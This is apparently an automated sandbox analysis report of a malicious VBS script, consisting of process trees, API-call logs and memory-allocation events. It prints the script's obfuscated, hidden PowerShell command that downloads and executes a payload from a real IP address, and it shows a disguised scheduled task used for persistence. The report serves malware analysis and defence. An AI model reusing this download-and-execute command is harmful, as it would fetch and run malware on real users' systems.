Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 20, 2023, 5:33 p.m.	Oct. 20, 2023, 5:35 p.m.

Size	1.6KB
Type	ASCII text, with CRLF line terminators
MD5	`73e726752629a1a3dba427ec1c2927fa`
SHA256	`bdbd6efb331ec4c6a2e7506855925a0f194af82c12a2f2deadfd1ee6d615eb0c`
CRC32	`377C246E`
ssdeep	`24:bN3bGdoQ17X0Lo+DzsTMnYkAI5vZraTidmYRjFwqa+4qr7:bNgoQJCoseMTAShrSa`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\gen.txt.vbs
3040
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/9X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2196

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.81.157.213	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 20, 2023, 5:33 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 20, 2023, 5:33 p.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: The term 'ï»¿$Content' is not recognized as the name of a cmdlet, function, scr console_handle: 0x00000023	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: ipt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: At line:1 char:12 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: + ï»¿$Content <<<< = @' console_handle: 0x00000053	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: + CategoryInfo : ObjectNotFound: (ï»¿$Content:String) [], Command console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: NotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: Name : Micros oftEdgeUpdate console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: Path : \Micros oftEdgeUpdate console_handle: 0x00000093	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: State : 3 console_handle: 0x00000097	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: Enabled : True console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000009f	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: LastTaskResult : 1 console_handle: 0x000000a3	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: NextRunTime : 2023-10-21 오전 12:15:31 console_handle: 0x000000ab	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: Definition : System.__ComObject console_handle: 0x000000af	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x000000b7	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <RegistrationInfo> console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x000000c3	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: n> console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: </RegistrationInfo> console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Triggers> console_handle: 0x000000cf	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <TimeTrigger> console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Repetition> console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x000000db	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x000000df	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: </Repetition> console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <StartBoundary>2023-10-21T00:13:31</StartBoundary> console_handle: 0x000000e7	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: </TimeTrigger> console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: </Triggers> console_handle: 0x000000f3	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Settings> console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: olicy> console_handle: 0x000000ff	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x00000103	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: tteries> console_handle: 0x00000107	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x0000010b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x00000113	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x00000117	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: lable> console_handle: 0x0000011b	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <IdleSettings> console_handle: 0x0000011f	1	1
WriteConsoleW Oct. 20, 2023, 5:33 p.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x00000123	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e16f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e11f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e11f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e11f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e18b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1bb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e12b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e12b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 20, 2023, 5:33 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003e1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 20, 2023, 5:33 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01dca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01dc2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02202000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02203000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02204000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01dcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02205000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02206000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
